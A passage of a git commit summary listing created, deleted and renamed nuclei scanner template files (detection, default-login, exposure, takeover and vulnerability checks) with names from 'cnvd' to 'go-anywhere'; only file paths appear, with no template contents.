delete mode 100644 nuclei-templates/Other/cnvd-2021-30167-1109.yaml rename nuclei-templates/Other/{cobbler-default-login-1121.yaml => cobbler-default-login-1120.yaml} (100%) create mode 100644 nuclei-templates/Other/cockpit-detect-1125.yaml delete mode 100644 nuclei-templates/Other/cockpit-detect-1127.yaml rename nuclei-templates/Other/{cockpit-workflow.yaml => cockpit-workflow-1129.yaml} (100%) create mode 100644 nuclei-templates/Other/codemeter-webadmin-panel-1135.yaml delete mode 100644 nuclei-templates/Other/codemeter-webadmin-panel-1137.yaml rename nuclei-templates/Other/{codian-mcu-login-1140.yaml => codian-mcu-login.yaml} (100%) delete mode 100644 nuclei-templates/Other/cofense-vision-panel-1141.yaml create mode 100644 nuclei-templates/Other/cofense-vision-panel-1142.yaml rename nuclei-templates/Other/{cold-fusion-cfcache-map-1149.yaml => cold-fusion-cfcache-map.yaml} (100%) delete mode 100644 nuclei-templates/Other/coldfusion-administrator-login-1145.yaml create mode 100644 nuclei-templates/Other/coldfusion-administrator-login.yaml create mode 100644 nuclei-templates/Other/coldfusion-debug-xss-1152.yaml delete mode 100644 nuclei-templates/Other/coldfusion-debug-xss-1154.yaml create mode 100644 nuclei-templates/Other/commax-biometric-auth-bypass-1157.yaml delete mode 100644 nuclei-templates/Other/commax-biometric-auth-bypass.yaml delete mode 100644 nuclei-templates/Other/commax-credentials-disclosure-1158.yaml create mode 100644 nuclei-templates/Other/commax-credentials-disclosure.yaml delete mode 100644 nuclei-templates/Other/comtrend-password-exposure-1166.yaml create mode 100644 nuclei-templates/Other/comtrend-password-exposure.yaml create mode 100644 nuclei-templates/Other/concourse-ci-panel-1169.yaml delete mode 100644 nuclei-templates/Other/concourse-ci-panel.yaml create mode 100644 nuclei-templates/Other/concrete-xss-1177.yaml delete mode 100644 nuclei-templates/Other/concrete-xss-1178.yaml delete mode 100644 nuclei-templates/Other/concrete5-install-1171.yaml create mode 100644 nuclei-templates/Other/concrete5-install.yaml create mode 100644 nuclei-templates/Other/concrete5-panel-1172.yaml delete mode 100644 nuclei-templates/Other/concrete5-panel.yaml rename nuclei-templates/Other/{configuration-listing-1183.yaml => configuration-listing-1182.yaml} (100%) create mode 100644 nuclei-templates/Other/confluence-detect-1187.yaml delete mode 100644 nuclei-templates/Other/confluence-detect.yaml rename nuclei-templates/Other/{confluence-ssrf-sharelinks-1191.yaml => confluence-ssrf-sharelinks-1192.yaml} (100%) rename nuclei-templates/Other/{contacam-1197.yaml => contacam.yaml} (100%) delete mode 100644 nuclei-templates/Other/content-scheme-1205.yaml create mode 100644 nuclei-templates/Other/content-scheme.yaml create mode 100644 nuclei-templates/Other/contentkeeper-detect-1203.yaml delete mode 100644 nuclei-templates/Other/contentkeeper-detect.yaml create mode 100644 nuclei-templates/Other/core-chuangtian-cloud-rce-1209.yaml delete mode 100644 nuclei-templates/Other/core-chuangtian-cloud-rce-1211.yaml create mode 100644 nuclei-templates/Other/coremail-config-disclosure-1215.yaml delete mode 100644 nuclei-templates/Other/coremail-config-disclosure.yaml rename nuclei-templates/Other/{couchbase-buckets-api-1232.yaml => couchbase-buckets-api-1233.yaml} (100%) rename nuclei-templates/Other/{couchdb-exposure-1239.yaml => couchdb-exposure-1238.yaml} (100%) delete mode 100644 nuclei-templates/Other/craft-cms-detect-1247.yaml create mode 100644 nuclei-templates/Other/craft-cms-detect.yaml create mode 100644 nuclei-templates/Other/craftcms-admin-panel-1245.yaml delete mode 100644 nuclei-templates/Other/craftcms-admin-panel.yaml create mode 100644 nuclei-templates/Other/credential-exposure-1249.yaml delete mode 100644 nuclei-templates/Other/credential-exposure-file.yaml delete mode 100644 nuclei-templates/Other/credentials-1257.yaml create mode 100644 nuclei-templates/Other/credentials-disclosure-1252.yaml delete mode 100644 nuclei-templates/Other/credentials-disclosure.yaml create mode 100644 nuclei-templates/Other/credentials.yaml delete mode 100644 nuclei-templates/Other/crmeb-sqli.yaml rename nuclei-templates/Other/{crush-ftp-detect.yaml => crush-ftp-detect-1271.yaml} (100%) rename nuclei-templates/Other/{crush-ftp-login-1275.yaml => crush-ftp-login.yaml} (100%) delete mode 100644 nuclei-templates/Other/cs-cart-unauthenticated-lfi-1281.yaml create mode 100644 nuclei-templates/Other/cs-cart-unauthenticated-lfi.yaml create mode 100644 nuclei-templates/Other/cs141-default-login-1280.yaml delete mode 100644 nuclei-templates/Other/cs141-default-login.yaml delete mode 100644 nuclei-templates/Other/csrfguard-detect-1291.yaml create mode 100644 nuclei-templates/Other/csrfguard-detect.yaml delete mode 100644 nuclei-templates/Other/custom-solr-file-read.yaml delete mode 100644 nuclei-templates/Other/custom-xss-check.yaml create mode 100644 nuclei-templates/Other/custom_nuclei-7.yaml rename nuclei-templates/Other/{cx-cloud-login.yaml => cx-cloud-login-6765.yaml} (100%) rename nuclei-templates/Other/{d-link-arbitary-fileread-7045.yaml => d-link-arbitary-fileread.yaml} (100%) create mode 100644 nuclei-templates/Other/d-link-wireless-7050.yaml delete mode 100644 nuclei-templates/Other/d-link-wireless.yaml create mode 100644 nuclei-templates/Other/dahua-wpms-addimgico-fileupload.yaml create mode 100644 "nuclei-templates/Other/dahua-\346\231\272\346\205\247\345\233\255\345\214\272\347\273\274\345\220\210\347\256\241\347\220\206\345\271\263\345\217\260.yaml" create mode 100644 nuclei-templates/Other/darkstat-detect-6767.yaml delete mode 100644 nuclei-templates/Other/darkstat-detect.yaml delete mode 100644 nuclei-templates/Other/database-error-6770.yaml create mode 100644 nuclei-templates/Other/database-error.yaml rename nuclei-templates/Other/{db-schema-6783.yaml => db-schema.yaml} (100%) delete mode 100644 nuclei-templates/Other/dbeaver-credentials-6779.yaml create mode 100644 nuclei-templates/Other/dbeaver-credentials-6782.yaml delete mode 100644 nuclei-templates/Other/dead-host-with-cname-6786.yaml create mode 100644 nuclei-templates/Other/dead-host-with-cname-6787.yaml create mode 100644 nuclei-templates/Other/dedecms-carbuyaction-fileinclude-6794.yaml delete mode 100644 nuclei-templates/Other/dedecms-carbuyaction-fileinclude.yaml create mode 100644 nuclei-templates/Other/dedecms-membergroup-sqli-6796.yaml delete mode 100644 nuclei-templates/Other/dedecms-membergroup-sqli-6798.yaml rename nuclei-templates/Other/{dedecms-openredirect-6803.yaml => dedecms-openredirect-6802.yaml} (100%) delete mode 100644 nuclei-templates/Other/default-apache-test-page-6816.yaml create mode 100644 nuclei-templates/Other/default-apache-test-page-6817.yaml create mode 100644 nuclei-templates/Other/default-apache2-page-6806.yaml delete mode 100644 nuclei-templates/Other/default-apache2-page.yaml create mode 100644 nuclei-templates/Other/default-codeigniter-page-6831.yaml delete mode 100644 nuclei-templates/Other/default-codeigniter-page-6832.yaml create mode 100644 nuclei-templates/Other/default-django-page-6840.yaml delete mode 100644 nuclei-templates/Other/default-django-page.yaml delete mode 100644 nuclei-templates/Other/default-fastcgi-page-6844.yaml create mode 100644 nuclei-templates/Other/default-fastcgi-page-6845.yaml rename nuclei-templates/Other/{default-fedora-page.yaml => default-fedora-page-6850.yaml} (100%) rename nuclei-templates/Other/{default-ibm-http-server-6857.yaml => default-ibm-http-server.yaml} (100%) rename nuclei-templates/Other/{default-iis7-page.yaml => default-iis7-page-6859.yaml} (100%) rename nuclei-templates/Other/{default-jetty-page-6864.yaml => default-jetty-page-6862.yaml} (100%) create mode 100644 nuclei-templates/Other/default-lighttpd-page-6866.yaml delete mode 100644 nuclei-templates/Other/default-lighttpd-page.yaml rename nuclei-templates/Other/{default-microsoft-azure-page.yaml => default-microsoft-azure-page-6874.yaml} (100%) create mode 100644 nuclei-templates/Other/default-movable-page-6878.yaml delete mode 100644 nuclei-templates/Other/default-movable-page.yaml delete mode 100644 nuclei-templates/Other/default-nginx-page-6881.yaml create mode 100644 nuclei-templates/Other/default-nginx-page-6882.yaml rename nuclei-templates/Other/{default-openresty-6886.yaml => default-openresty-6884.yaml} (100%) rename nuclei-templates/Other/{default-redhat-test-page-6903.yaml => default-redhat-test-page-6904.yaml} (100%) delete mode 100644 nuclei-templates/Other/default-ssltls-test-page-6907.yaml create mode 100644 nuclei-templates/Other/default-ssltls-test-page-6908.yaml rename nuclei-templates/Other/{default-tomcat-page.yaml => default-tomcat-page-6911.yaml} (100%) delete mode 100644 nuclei-templates/Other/default-windows-server-page-6912.yaml create mode 100644 nuclei-templates/Other/default-windows-server-page.yaml create mode 100644 nuclei-templates/Other/defectdojo-panel-6916.yaml delete mode 100644 nuclei-templates/Other/defectdojo-panel.yaml create mode 100644 nuclei-templates/Other/dell-idrac-default-login-6942.yaml delete mode 100644 nuclei-templates/Other/dell-idrac-default-login-6943.yaml rename nuclei-templates/Other/{dell-idrac-workflow.yaml => dell-idrac-workflow-6947.yaml} (100%) create mode 100644 nuclei-templates/Other/dell-idrac6-detect-6918.yaml delete mode 100644 nuclei-templates/Other/dell-idrac6-detect-6919.yaml create mode 100644 nuclei-templates/Other/dell-idrac7-detect-6922.yaml delete mode 100644 nuclei-templates/Other/dell-idrac7-detect-6924.yaml delete mode 100644 nuclei-templates/Other/dell-idrac9-default-login-6934.yaml create mode 100644 nuclei-templates/Other/dell-idrac9-default-login.yaml create mode 100644 nuclei-templates/Other/dell-idrac9-detect-6937.yaml delete mode 100644 nuclei-templates/Other/dell-idrac9-detect.yaml create mode 100644 nuclei-templates/Other/dell-openmanager-login-6949.yaml delete mode 100644 nuclei-templates/Other/dell-openmanager-login-6950.yaml create mode 100644 nuclei-templates/Other/dell-wyse-login-6954.yaml delete mode 100644 nuclei-templates/Other/dell-wyse-login-6955.yaml create mode 100644 nuclei-templates/Other/deprecated-tls-6959.yaml delete mode 100644 nuclei-templates/Other/deprecated-tls.yaml create mode 100644 nuclei-templates/Other/detect-addpac-voip-gateway-6963.yaml delete mode 100644 nuclei-templates/Other/detect-addpac-voip-gateway.yaml delete mode 100644 nuclei-templates/Other/detect-all-takovers.yaml delete mode 100644 nuclei-templates/Other/detect-dns-over-https-6969.yaml create mode 100644 nuclei-templates/Other/detect-dns-over-https-6970.yaml create mode 100644 nuclei-templates/Other/detect-drone-config-6973.yaml delete mode 100644 nuclei-templates/Other/detect-drone-config.yaml create mode 100644 nuclei-templates/Other/detect-jabber-xmpp-6974.yaml delete mode 100644 nuclei-templates/Other/detect-jabber-xmpp.yaml create mode 100644 nuclei-templates/Other/detect-options-method-6977.yaml delete mode 100644 nuclei-templates/Other/detect-options-method.yaml create mode 100644 nuclei-templates/Other/detect-rsyncd-6979.yaml delete mode 100644 nuclei-templates/Other/detect-rsyncd-6980.yaml rename nuclei-templates/Other/{dicoogle-pacs-lfi-6993.yaml => dicoogle-pacs-lfi.yaml} (100%) rename nuclei-templates/Other/{Digital-Signage-rce.yaml => digital-signage-rce.yaml} (100%) delete mode 100644 nuclei-templates/Other/dir-listing-7008.yaml create mode 100644 nuclei-templates/Other/dir-listing.yaml create mode 100644 nuclei-templates/Other/directadmin-login-panel-7000.yaml delete mode 100644 nuclei-templates/Other/directadmin-login-panel-7001.yaml delete mode 100644 nuclei-templates/Other/discourse-xss-7013.yaml create mode 100644 nuclei-templates/Other/discourse-xss.yaml rename nuclei-templates/Other/{django-admin-panel.yaml => django-admin-panel-7021.yaml} (100%) delete mode 100644 nuclei-templates/Other/django-debug-detect-7027.yaml rename nuclei-templates/Other/{django-debug-exposure-7031.yaml => django-debug-exposure-csrf.yaml} (100%) create mode 100644 nuclei-templates/Other/django-debug.yaml rename nuclei-templates/Other/{django-framework-exceptions-7033.yaml => django-framework-exceptions-7034.yaml} (100%) create mode 100644 nuclei-templates/Other/django-secret-key.yaml delete mode 100644 nuclei-templates/Other/django-secret.key.yaml create mode 100644 nuclei-templates/Other/dlink-850L-info-leak.yaml delete mode 100644 nuclei-templates/Other/dlink-850l-info-leak-7038.yaml delete mode 100644 nuclei-templates/Other/dns-waf-detect-7052.yaml create mode 100644 nuclei-templates/Other/dns-waf-detect-7053.yaml delete mode 100644 nuclei-templates/Other/dnssec-detection-7051.yaml create mode 100644 nuclei-templates/Other/dnssec-detection.yaml rename nuclei-templates/Other/{DocCMS-keyword-sqli.yaml => doccms-keyword-sqli.yaml} (100%) delete mode 100644 nuclei-templates/Other/docker-api.yaml create mode 100644 nuclei-templates/Other/docker-registry-7067.yaml delete mode 100644 nuclei-templates/Other/docker-registry-7068.yaml delete mode 100644 nuclei-templates/Other/dockercfg-config-7055.yaml create mode 100644 nuclei-templates/Other/dockercfg-config-7056.yaml create mode 100644 nuclei-templates/Other/dockerfile-hidden-disclosure-7063.yaml delete mode 100644 nuclei-templates/Other/dockerfile-hidden-disclosure.yaml create mode 100644 nuclei-templates/Other/dokmee ecm.yaml delete mode 100644 nuclei-templates/Other/dolphinscheduler-default-login-7072.yaml create mode 100644 nuclei-templates/Other/dolphinscheduler-default-login-7073.yaml create mode 100644 nuclei-templates/Other/dom-xss-7079.yaml delete mode 100644 nuclei-templates/Other/domcfg-page-7077.yaml create mode 100644 nuclei-templates/Other/domcfg-page.yaml delete mode 100644 nuclei-templates/Other/domxss.yaml rename nuclei-templates/Other/{dotclear-detect-7083.yaml => dotclear-detect-7084.yaml} (100%) create mode 100644 nuclei-templates/Other/dotnetcms-sqli-7089.yaml create mode 100644 nuclei-templates/Other/druid-console-exposure-7092.yaml delete mode 100644 nuclei-templates/Other/druid-console-exposure-7094.yaml rename nuclei-templates/Other/{druid-default-login-7096.yaml => druid-default-login-7097.yaml} (100%) delete mode 100644 nuclei-templates/Other/druid-monitor-7100.yaml create mode 100644 nuclei-templates/Other/druid-monitor-7102.yaml rename nuclei-templates/Other/{drupal-install-7106.yaml => drupal-install-7107.yaml} (100%) rename nuclei-templates/Other/{drupal-user-enum-ajax-7109.yaml => drupal-user-enum-ajax-7111.yaml} (100%) rename nuclei-templates/Other/{ds_store.yaml => ds_store-7119.yaml} (100%) rename nuclei-templates/Other/{DSE855.yaml => dse855.yaml} (100%) create mode 100644 nuclei-templates/Other/dss-download-fileread-7116.yaml delete mode 100644 nuclei-templates/Other/dss-download-fileread-7117.yaml delete mode 100644 nuclei-templates/Other/duomicms-sql-injection-7122.yaml create mode 100644 nuclei-templates/Other/duomicms-sql-injection-7125.yaml rename nuclei-templates/Other/{dvwa-default-login-7129.yaml => dvwa-default-login.yaml} (100%) rename nuclei-templates/Other/{dvwa-headless-automatic-login-7132.yaml => dvwa-headless-automatic-login-7133.yaml} (100%) create mode 100644 nuclei-templates/Other/dwr-index-detect-7134.yaml delete mode 100644 nuclei-templates/Other/dwr-index-detect-7135.yaml create mode 100644 nuclei-templates/Other/dwsync-exposure-7139.yaml delete mode 100644 nuclei-templates/Other/dwsync-exposure.yaml rename nuclei-templates/Other/{dynamic-broadcast-receiver.yaml => dynamic-broadcast-receiver-7140.yaml} (100%) delete mode 100644 nuclei-templates/Other/dynamicweb-panel-7143.yaml create mode 100644 nuclei-templates/Other/dynamicweb-panel-7144.yaml rename nuclei-templates/Other/{dzs-zoomsounds-listing.yaml => dzs-zoomsounds-listing-7147.yaml} (100%) delete mode 100644 nuclei-templates/Other/easy-media-gallery-pro-listing-7150.yaml create mode 100644 nuclei-templates/Other/easy-media-gallery-pro-listing-7153.yaml create mode 100644 nuclei-templates/Other/eatery-restaurant-open-redirect-7158.yaml delete mode 100644 nuclei-templates/Other/eatery-restaurant-open-redirect.yaml create mode 100644 nuclei-templates/Other/ecology-arbitrary-file-upload-7169.yaml delete mode 100644 nuclei-templates/Other/ecology-arbitrary-file-upload.yaml rename nuclei-templates/Other/{ecology-filedownload-directory-traversal-7171.yaml => ecology-filedownload-directory-traversal.yaml} (100%) create mode 100644 nuclei-templates/Other/ecology-oa-HrmCareerApplyPerView-sqli.yaml delete mode 100644 nuclei-templates/Other/ecology_E-Office_Uploadify_FileUpload.yaml create mode 100644 nuclei-templates/Other/eg-manager-detect-7184.yaml delete mode 100644 nuclei-templates/Other/eg-manager-detect.yaml delete mode 100644 nuclei-templates/Other/elFinder-path-traversal.yaml create mode 100644 nuclei-templates/Other/elasticbeantalk-takeover-7188.yaml delete mode 100644 nuclei-templates/Other/elasticbeantalk-takeover.yaml delete mode 100644 nuclei-templates/Other/elasticsearch-7196.yaml create mode 100644 nuclei-templates/Other/elasticsearch.yaml delete mode 100644 nuclei-templates/Other/elex-woocommerce-xss-7200.yaml create mode 100644 nuclei-templates/Other/elex-woocommerce-xss.yaml create mode 100644 nuclei-templates/Other/elfinder-path-traversal(1).yaml delete mode 100644 nuclei-templates/Other/elfinder-version-7205.yaml create mode 100644 nuclei-templates/Other/elfinder-version.yaml create mode 100644 nuclei-templates/Other/emcecom-default-login-7211.yaml delete mode 100644 nuclei-templates/Other/emcecom-default-login-7212.yaml rename nuclei-templates/Other/{EmpireCMS-rate-sqli.yaml => empirecms-rate-sqli.yaml} (100%) rename nuclei-templates/Other/{empirecms-xss-7220.yaml => empirecms-xss.yaml} (100%) rename nuclei-templates/Other/{emqx-default-login-7222.yaml => emqx-default-login-7221.yaml} (100%) rename nuclei-templates/Other/{ems-login-panel-7225.yaml => ems-login-panel-7223.yaml} (100%) create mode 100644 nuclei-templates/Other/env.yaml rename nuclei-templates/Other/{epmp-login-7229.yaml => epmp-login-7231.yaml} (100%) create mode 100644 nuclei-templates/Other/epson-projector-detect-7238.yaml delete mode 100644 nuclei-templates/Other/epson-projector-detect.yaml delete mode 100644 nuclei-templates/Other/epson-web-control-detect-7242.yaml create mode 100644 nuclei-templates/Other/epson-web-control-detect.yaml rename nuclei-templates/Other/{epson-wf-series-7244.yaml => epson-wf-series.yaml} (100%) delete mode 100644 nuclei-templates/Other/erp-nc-directory-traversal-7245.yaml create mode 100644 nuclei-templates/Other/erp-nc-directory-traversal-7248.yaml create mode 100644 nuclei-templates/Other/error-based-sql-injection-7249.yaml delete mode 100644 nuclei-templates/Other/error-based-sql-injection.yaml rename nuclei-templates/Other/{time.yaml => error-based.yaml} (100%) rename nuclei-templates/Other/{error-logs-7255.yaml => error-logs-7252.yaml} (100%) create mode 100644 nuclei-templates/Other/esmtprc-config-7258.yaml delete mode 100644 nuclei-templates/Other/esmtprc-config.yaml rename nuclei-templates/Other/{etcd-keys-7261.yaml => etcd-keys.yaml} (100%) delete mode 100644 nuclei-templates/Other/etouch-v2-sqli-7266.yaml create mode 100644 nuclei-templates/Other/etouch-v2-sqli.yaml delete mode 100644 nuclei-templates/Other/exacqvision-default-login-7274.yaml create mode 100644 nuclei-templates/Other/exacqvision-default-login-7275.yaml delete mode 100644 nuclei-templates/Other/example-template.yaml delete mode 100644 nuclei-templates/Other/exploit-cve-2022-1388.yaml rename nuclei-templates/Other/{expn-mail-detect-7279.yaml => expn-mail-detect.yaml} (100%) create mode 100644 nuclei-templates/Other/exposed-adb-7280.yaml delete mode 100644 nuclei-templates/Other/exposed-adb-7281.yaml rename nuclei-templates/Other/{exposed-alps-spring.yaml => exposed-alps-spring-7285.yaml} (100%) rename nuclei-templates/Other/{exposed-bitkeeper.yaml => exposed-bitkeeper-7291.yaml} (100%) rename nuclei-templates/Other/{exposed-darcs-7298.yaml => exposed-darcs.yaml} (100%) create mode 100644 nuclei-templates/Other/exposed-docker-api-7301.yaml delete mode 100644 nuclei-templates/Other/exposed-glances-api-7309.yaml create mode 100644 nuclei-templates/Other/exposed-glances-api.yaml delete mode 100644 nuclei-templates/Other/exposed-jquery-file-upload-7315.yaml create mode 100644 nuclei-templates/Other/exposed-jquery-file-upload.yaml delete mode 100644 nuclei-templates/Other/exposed-kibana-7319.yaml create mode 100644 nuclei-templates/Other/exposed-kibana-7320.yaml rename nuclei-templates/Other/{exposed-nomad-7329.yaml => exposed-nomad.yaml} (100%) create mode 100644 nuclei-templates/Other/exposed-redis-7335.yaml delete mode 100644 nuclei-templates/Other/exposed-redis-7336.yaml rename nuclei-templates/Other/{exposed-service-now-7343.yaml => exposed-service-now-7342.yaml} (100%) create mode 100644 nuclei-templates/Other/exposed-springboot.yaml rename nuclei-templates/Other/{exposed-sqlite-manager.yaml => exposed-sqlite-manager-7350.yaml} (100%) rename nuclei-templates/Other/{exposed-svn-7351.yaml => exposed-svn-7354.yaml} (100%) delete mode 100644 nuclei-templates/Other/exposed-webalizer-7358.yaml create mode 100644 nuclei-templates/Other/exposed-webalizer.yaml rename nuclei-templates/Other/{detection-zookeeper.yaml => exposed-zookeeper-7363.yaml} (100%) rename nuclei-templates/Other/{express-lfr-post (copy 1).yaml => expresslfr_post.yaml} (100%) delete mode 100644 nuclei-templates/Other/exsi-system-7366.yaml create mode 100644 nuclei-templates/Other/exsi-system.yaml rename nuclei-templates/Other/{extreme-netconfig-ui.yaml => extreme-netconfig-ui-7372.yaml} (100%) create mode 100644 nuclei-templates/Other/f-secure-policy-manager-7564.yaml delete mode 100644 nuclei-templates/Other/f-secure-policy-manager.yaml create mode 100644 nuclei-templates/Other/facebook-client-id-7385.yaml delete mode 100644 nuclei-templates/Other/facebook-client-id.yaml delete mode 100644 nuclei-templates/Other/facebook-secrets.yaml rename nuclei-templates/Other/{fanruan-channel-deserialization.yaml => fanruan-deserialization.yaml} (100%) rename nuclei-templates/Other/{fanruanoa2012-disclosure-7390.yaml => fanruanoa2012-disclosure.yaml} (100%) delete mode 100644 nuclei-templates/Other/faraday-login-7395.yaml create mode 100644 nuclei-templates/Other/faraday-login-7397.yaml rename nuclei-templates/Other/{fastapi-docs-7399.yaml => fastapi-docs-7398.yaml} (100%) create mode 100644 nuclei-templates/Other/fastjson-1-2-41-rce-7403.yaml delete mode 100644 nuclei-templates/Other/fastjson-1-2-41-rce-7404.yaml rename nuclei-templates/Other/{fastjson-1-2-43-rce.yaml => fastjson-1-2-43-rce-7412.yaml} (100%) delete mode 100644 nuclei-templates/Other/fastjson-1-2-47-rce-7415.yaml create mode 100644 nuclei-templates/Other/fastjson-1-2-47-rce.yaml create mode 100644 nuclei-templates/Other/fastjson-1-2-62-rce-7420.yaml delete mode 100644 nuclei-templates/Other/fastjson-1-2-62-rce.yaml rename nuclei-templates/Other/{fastjson-1-2-67-rce-7423.yaml => fastjson-1-2-67-rce.yaml} (100%) delete mode 100644 nuclei-templates/Other/fastjson-1-2-68-rce-7425.yaml create mode 100644 nuclei-templates/Other/fastjson-1-2-68-rce.yaml delete mode 100644 nuclei-templates/Other/fatpipe-auth-bypass-7431.yaml create mode 100644 nuclei-templates/Other/fatpipe-auth-bypass.yaml rename nuclei-templates/Other/{fatpipe-ipvpn-panel-7436.yaml => fatpipe-ipvpn-panel.yaml} (100%) delete mode 100644 nuclei-templates/Other/favicon-detection-7441.yaml create mode 100644 nuclei-templates/Other/favicon-detection.yaml create mode 100644 nuclei-templates/Other/fcm-server-key-7452.yaml delete mode 100644 nuclei-templates/Other/fcm-server-key-7453.yaml create mode 100644 nuclei-templates/Other/feedpress-takeover-7456.yaml delete mode 100644 nuclei-templates/Other/feedpress-takeover-7457.yaml delete mode 100644 nuclei-templates/Other/feifeicms-lfr-7462.yaml create mode 100644 nuclei-templates/Other/feifeicms-lfr-7466.yaml create mode 100644 nuclei-templates/Other/file-scheme-7468.yaml delete mode 100644 nuclei-templates/Other/file-scheme-7469.yaml delete mode 100644 nuclei-templates/Other/filezilla-7470.yaml create mode 100644 nuclei-templates/Other/filezilla.yaml rename nuclei-templates/Other/{fiorilaunchpad-logon-7484.yaml => fiorilaunchpad-logon.yaml} (100%) create mode 100644 nuclei-templates/Other/firebase-database-7489.yaml delete mode 100644 nuclei-templates/Other/firebase-database-7490.yaml delete mode 100644 nuclei-templates/Other/firebase-detect-7493.yaml create mode 100644 nuclei-templates/Other/firebase-detect-7494.yaml create mode 100644 nuclei-templates/Other/firebase-urls-7498.yaml delete mode 100644 nuclei-templates/Other/firebase-urls-7499.yaml rename nuclei-templates/Other/{fireware-xtm-user-authentication-7503.yaml => fireware-xtm-user-authentication.yaml} (100%) delete mode 100644 nuclei-templates/Other/flexbe-takeover-7505.yaml create mode 100644 nuclei-templates/Other/flexbe-takeover-7506.yaml delete mode 100644 nuclei-templates/Other/flightpath-panel-7508.yaml create mode 100644 nuclei-templates/Other/flightpath-panel.yaml delete mode 100644 nuclei-templates/Other/flink-exposure-7509.yaml create mode 100644 nuclei-templates/Other/flink-exposure.yaml rename nuclei-templates/Other/{flir-default-login.yaml => flir-default-login-7513.yaml} (100%) create mode 100644 nuclei-templates/Other/forcepoint-7529.yaml delete mode 100644 nuclei-templates/Other/forcepoint.yaml create mode 100644 nuclei-templates/Other/foulenzer-subdomain-tk (copy 1).yaml delete mode 100644 nuclei-templates/Other/freshdesk-takeover-7540.yaml create mode 100644 nuclei-templates/Other/freshdesk-takeover.yaml delete mode 100644 nuclei-templates/Other/front-page-misconfig-7547.yaml create mode 100644 nuclei-templates/Other/front-page-misconfig-7548.yaml delete mode 100644 nuclei-templates/Other/frp-default-login-7557.yaml create mode 100644 nuclei-templates/Other/frp-default-login-7559.yaml create mode 100644 nuclei-templates/Other/ftp-default-credentials.yaml delete mode 100644 nuclei-templates/Other/ftp-default-creds.yaml create mode 100644 nuclei-templates/Other/ftpconfig-7565.yaml delete mode 100644 nuclei-templates/Other/ftpconfig-7566.yaml delete mode 100644 nuclei-templates/Other/gSOAP-LFl.yaml create mode 100644 nuclei-templates/Other/ganglia-xml-grid-monitor-7573.yaml delete mode 100644 nuclei-templates/Other/ganglia-xml-grid-monitor.yaml create mode 100644 nuclei-templates/Other/gemfury-takeover-7576.yaml delete mode 100644 nuclei-templates/Other/gemfury-takeover-7579.yaml rename nuclei-templates/Other/{general-tokens-7580.yaml => general-tokens-7586.yaml} (100%) delete mode 100644 nuclei-templates/Other/generic-linux-lfi-7588.yaml create mode 100644 nuclei-templates/Other/generic-linux-lfi-7589.yaml delete mode 100644 nuclei-templates/Other/generic-windows-lfi-7592.yaml create mode 100644 nuclei-templates/Other/generic-windows-lfi.yaml delete mode 100644 nuclei-templates/Other/geovision-geowebserver-lfi-7595.yaml create mode 100644 nuclei-templates/Other/geovision-geowebserver-lfi-7596.yaml delete mode 100644 nuclei-templates/Other/geovision-geowebserver-xss-7600.yaml create mode 100644 nuclei-templates/Other/geovision-geowebserver-xss.yaml delete mode 100644 nuclei-templates/Other/get-override-sni.yaml rename nuclei-templates/Other/{getresponse-takeover-7609.yaml => getresponse-takeover-7608.yaml} (100%) create mode 100644 nuclei-templates/Other/getsimple-cms-detector-7613.yaml delete mode 100644 nuclei-templates/Other/getsimple-cms-detector.yaml create mode 100644 nuclei-templates/Other/getsimple-installation-7618.yaml delete mode 100644 nuclei-templates/Other/getsimple-installation.yaml rename nuclei-templates/Other/{GetSimple-leakage.yaml => getsimple-leakage.yaml} (100%) delete mode 100644 nuclei-templates/Other/ghost-takeover-7620.yaml create mode 100644 nuclei-templates/Other/ghost-takeover-7621.yaml create mode 100644 nuclei-templates/Other/git-config-7635.yaml delete mode 100644 nuclei-templates/Other/git-config-7636.yaml rename nuclei-templates/Other/{git-config-nginxoffbyslash-7632.yaml => git-config-nginxoffbyslash-7631.yaml} (100%) delete mode 100644 nuclei-templates/Other/git-credentials-disclosure-7639.yaml create mode 100644 nuclei-templates/Other/git-credentials-disclosure.yaml delete mode 100644 nuclei-templates/Other/git-mailmap-7710.yaml create mode 100644 nuclei-templates/Other/git-mailmap.yaml rename nuclei-templates/Other/{gitbook-detect.yaml => gitbook-detect-7624.yaml} (100%) rename nuclei-templates/Other/{gitea-login-7645.yaml => gitea-login-7646.yaml} (100%) rename nuclei-templates/Other/{github-enterprise-detect.yaml => github-enterprise-detect-7649.yaml} (100%) rename nuclei-templates/Other/{github-gemfile-files.yaml => github-gemfile-files-7652.yaml} (100%) create mode 100644 nuclei-templates/Other/github-takeover-7660.yaml delete mode 100644 nuclei-templates/Other/github-takeover-7663.yaml rename nuclei-templates/Other/{github-workflows-disclosure-7664.yaml => github-workflows-disclosure-7665.yaml} (100%) rename nuclei-templates/Other/{gitlab-detect.yaml => gitlab-detect-7673.yaml} (100%) create mode 100644 nuclei-templates/Other/gitlab-public-repos-7677.yaml delete mode 100644 nuclei-templates/Other/gitlab-public-repos-7680.yaml rename nuclei-templates/Other/{gitlab-public-signup-7683.yaml => gitlab-public-signup-7684.yaml} (100%) create mode 100644 nuclei-templates/Other/gitlab-public-snippets-7685.yaml delete mode 100644 nuclei-templates/Other/gitlab-public-snippets-7686.yaml delete mode 100644 nuclei-templates/Other/gitlab-rce-7692.yaml create mode 100644 nuclei-templates/Other/gitlab-rce-7693.yaml rename nuclei-templates/Other/{gitlab-user-enum.yaml => gitlab-user-enum-7701.yaml} (100%) delete mode 100644 nuclei-templates/Other/gitlab-weak-login-7704.yaml create mode 100644 nuclei-templates/Other/gitlab-weak-login-7705.yaml rename nuclei-templates/Other/{global-domains-lfi-7715.yaml => global-domains-lfi-7714.yaml} (100%) delete mode 100644 nuclei-templates/Other/global-domains-xss-7717.yaml create mode 100644 nuclei-templates/Other/global-domains-xss-7718.yaml rename nuclei-templates/Other/{globalprotect-panel.yaml => globalprotect-panel-7719.yaml} (100%) rename nuclei-templates/Other/{gloo-unauth.yaml => gloo-unauth-7722.yaml} (100%) create mode 100644 nuclei-templates/Other/glpi-9.3.3-sql-injection(1).yaml rename nuclei-templates/Other/{glpi-authentication.yaml => glpi-authentication-7729.yaml} (100%) create mode 100644 nuclei-templates/Other/glpi-default-login-7731.yaml delete mode 100644 nuclei-templates/Other/glpi-default-login-7733.yaml rename nuclei-templates/Other/{glpi-telemetry-disclosure.yaml => glpi-telemetry-disclosure-7738.yaml} (100%) create mode 100644 nuclei-templates/Other/glpi_CVE-2022-35914.yaml create mode 100644 nuclei-templates/Other/gnuboard-detect-7742.yaml delete mode 100644 nuclei-templates/Other/gnuboard-detect.yaml rename nuclei-templates/Other/{go-anywhere-client-7745.yaml => go-anywhere-client-7743.yaml} (100%) create mode 100644 